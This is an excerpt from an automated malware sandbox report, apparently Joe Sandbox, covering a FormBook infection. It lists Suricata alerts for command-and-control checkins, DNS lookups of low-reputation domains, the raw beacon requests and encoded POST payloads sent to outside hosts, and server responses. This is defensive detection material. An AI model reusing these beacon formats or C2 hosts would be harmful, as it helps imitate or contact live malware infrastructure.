                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50012 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50004 -> 146.88.233.115:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49984 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50018 -> 172.67.215.235:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49999 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50007 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50015 -> 81.2.196.19:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50020 -> 172.67.215.235:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50016 -> 81.2.196.19:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50009 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49997 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49974 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50003 -> 146.88.233.115:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50019 -> 172.67.215.235:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50011 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50021 -> 172.67.215.235:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50008 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50023 -> 172.67.145.234:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.zoiheat.xyz
                Source: DNS query: www.zoiheat.xyz
                Source: Joe Sandbox ViewIP Address: 146.88.233.115 146.88.233.115
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: PLANETHOSTER-8CA PLANETHOSTER-8CA
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: INTERNET-CZKtis238403KtisCZ INTERNET-CZKtis238403KtisCZ
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /ti6k/?PHM8hj-=aooN9XnxZY5vLLqgNnNPDa+Wz6ZYVA+W9S/CD7OrytslWQsmx2XgKXMgpigq5ofFs8zPBHqDWa6akLIztBxoZf4FTaZeBdqZz3vksMYpoRC+eIBKeBja80AWwPS+rTgBCnnhKClLlEID&tHfx=9byl HTTP/1.1Host: www.zoiheat.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1yxc/?PHM8hj-=sNv20zOiDYMkOMIaI1pmdsmeUTcgC7U2G3KMZ1n3ZrvJqNyjokS5yfEka1CqXs0XgMjSEo6oJscLiFZx2eOkVujOahZ4zlc0tGcqNQ4Ewnbxtpizbi9lhn/PRfD4HtEYcHVJw6C2z+yJ&tHfx=9byl HTTP/1.1Host: www.questmatch.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /7mvy/?tHfx=9byl&PHM8hj-=h6bUgYM5oQIom3SHXrnUV9+6DYsiZuc3BKiCH+SaZEqPzQm7dEGcQubAgG7/7Rf+j7zw0nSl+ctDVIcki0zjLR/A1TIEgAjCXsb9E8vzRRsKI3KJo+lQnIV0aLjvGHYK1ASSJWLRp1oA HTTP/1.1Host: www.mrpokrovskii.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /zu0o/?PHM8hj-=b+T4d2yBdzwUctMd/6rbp8e/L5VppQdPUeEaq4sP5cuMDP5lcr7xrt20xN8o8Q5MDPDMLZuxAQ7GazkQMM9RW/M6GCGyp3PrdvQ7twyTbIssAsfn0uYUlKbzmGUUwxyTqeuUq5+1WDkR&tHfx=9byl HTTP/1.1Host: www.kvsj.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /n8su/?tHfx=9byl&PHM8hj-=lFR6PBva/PMsONRUUBzFKHYbuqVDpA3Go4dEt9E07rmpJDSADrt1qR4xH95d6yRrR+B0iSrIYOXOwv3G4XacVuIE8qbhb6NY234rB3YRB473z9LLt/rnbiO/m9aaM2mDRrx6Wavidd+l HTTP/1.1Host: www.learniit.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /an5q/?PHM8hj-=ht9kvQ/be1JP/b8F6dsuUaMB3kIjPw/jKA2fsfIfXx0uGnoFDxCnsR3TxOuY1Ct1ICtwCZ7n9C9rVjVINs3eX7araPangYQRXR4uJHW7jN2yh/2XdhodgIRd1WkPDwc0LSaAOvXgTCEN&tHfx=9byl HTTP/1.1Host: www.bankseedz.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ugyg/?tHfx=9byl&PHM8hj-=oCZiSXk+P+GRfK1CTz9r2QoANXD5JZtnUXBBKsmFkR5XdaXHzOV8eQzOlgaiqn8Qx6Xg8OpRPwSVnkrV8FGOE/7M7rIWJSwROyp8WcVtqR88cxmX/+Bsohxbo7MCCLhiJklW/Y5ke4/8 HTTP/1.1Host: www.dietcoffee.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /m1g9/?PHM8hj-=Cu+laRdL4iPyeXPNzSyuHz7Zauix7uTgmbFpChU/EeiHg3j+sEFT8Tsla6iUPxcW2Lx9lDY/eAXQyxZGKIZ6WavBUK62sZwr5lKAXnKNE4AVmzabioebOGd6nWTxCWiwwjsJNJ3z4u1Z&tHfx=9byl HTTP/1.1Host: www.smartcongress.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /8mom/?tHfx=9byl&PHM8hj-=v3XpYZPN786X74uq5rH/tUlQYCSKKJswOZfu2m4ZpmP7p96MXgDDjg6tIOsL1UDqFEVhH3VxTleyM0zNBIvLkhe6iRJHcqM7Dhz4vbv1gsAxBWEBkrF+OsuoFL7bmmLpMN9zG59B7XRp HTTP/1.1Host: www.carsten.studioAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /5p01/?PHM8hj-=gA6TElZrCKVvAudK23F9jNDYdfN6rlDKrsL6QppRHZfK3DYPsJvxm5gqg5Wra8oJ+dNxCku7PXatRX1MrBH30S65OjFWUkDmOoMpCFx3AEVSn7FxR5wufZcQu20w9g7Qi9GQUVJhypaN&tHfx=9byl HTTP/1.1Host: www.krshop.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /k6bb/?tHfx=9byl&PHM8hj-=Z6Ib5suwfioT2MqXoPl7+8o1pTKj4Qq520tiYNnV3r2mKqn+I/1Rm9W7kmGP+w3QV4Zo4FZXiImSr7GjAT/7kY4RF4YTze4eHm0UBMvXCvyEnRCS3SYcyFprHgke6jUgzgZsbqAOrl5q HTTP/1.1Host: www.rysanekbeton.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gvzg/?PHM8hj-=3ZtrxXVK8OpQj/Id+SsCZR/FL5/Fz5CPqtakmq6NsaDAWPHTfqsTRo2NSgZOgOtgjwZcpccTv84fMQQl56Kttpvgnc7345UpTfNvcW90g2TqWWaj2VNxmTxTXc1CDHCPjDNjR8Ywq9s3&tHfx=9byl HTTP/1.1Host: www.airrelax.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.zoiheat.xyz
                Source: global trafficDNS traffic detected: DNS query: www.questmatch.pro
                Source: global trafficDNS traffic detected: DNS query: www.mrpokrovskii.pro
                Source: global trafficDNS traffic detected: DNS query: www.sodatool.site
                Source: global trafficDNS traffic detected: DNS query: www.tb0.shop
                Source: global trafficDNS traffic detected: DNS query: www.kvsj.net
                Source: global trafficDNS traffic detected: DNS query: www.learniit.info
                Source: global trafficDNS traffic detected: DNS query: www.bankseedz.info
                Source: global trafficDNS traffic detected: DNS query: www.dietcoffee.online
                Source: global trafficDNS traffic detected: DNS query: www.smartcongress.net
                Source: global trafficDNS traffic detected: DNS query: www.carsten.studio
                Source: global trafficDNS traffic detected: DNS query: www.krshop.shop
                Source: global trafficDNS traffic detected: DNS query: www.rysanekbeton.cloud
                Source: global trafficDNS traffic detected: DNS query: www.airrelax.shop
                Source: global trafficDNS traffic detected: DNS query: www.vayui.top
                Source: unknownHTTP traffic detected: POST /1yxc/ HTTP/1.1Host: www.questmatch.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.questmatch.proReferer: http://www.questmatch.pro/1yxc/Content-Length: 220Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36Data Raw: 50 48 4d 38 68 6a 2d 3d 68 50 48 57 33 44 36 55 44 36 46 62 58 50 73 55 49 33 6c 67 63 2b 47 73 61 43 51 6b 49 61 35 63 43 41 57 70 64 45 4f 70 54 4c 2b 67 68 39 57 61 68 45 2f 72 77 50 52 35 54 32 4f 2f 52 75 42 47 34 74 4c 52 51 72 65 77 48 73 49 49 2f 77 46 78 38 2b 32 59 45 66 7a 50 4e 54 6c 6f 74 56 45 54 70 45 49 55 62 52 55 35 2b 46 66 63 72 71 6a 77 46 56 74 4b 69 55 75 4a 61 6f 2f 53 46 35 35 53 66 69 52 58 76 72 61 6a 35 65 75 6c 50 56 4f 66 53 4e 6d 47 48 30 72 32 66 70 52 2f 67 30 37 51 74 41 6c 65 31 64 47 7a 62 53 32 78 2f 44 65 68 33 75 2f 79 33 48 49 35 51 43 70 65 48 35 73 58 4d 62 31 31 74 33 75 36 67 75 41 37 70 36 49 70 75 77 3d 3d Data Ascii: PHM8hj-=hPHW3D6UD6FbXPsUI3lgc+GsaCQkIa5cCAWpdEOpTL+gh9WahE/rwPR5T2O/RuBG4tLRQrewHsII/wFx8+2YEfzPNTlotVETpEIUbRU5+FfcrqjwFVtKiUuJao/SF55SfiRXvraj5eulPVOfSNmGH0r2fpR/g07QtAle1dGzbS2x/Deh3u/y3HI5QCpeH5sXMb11t3u6guA7p6Ipuw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 09 Dec 2024 05:56:58 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-09T05:57:03.7011834Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 05:58:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 05:58:05 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 05:58:08 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 05:58:10 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 05:58:18 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
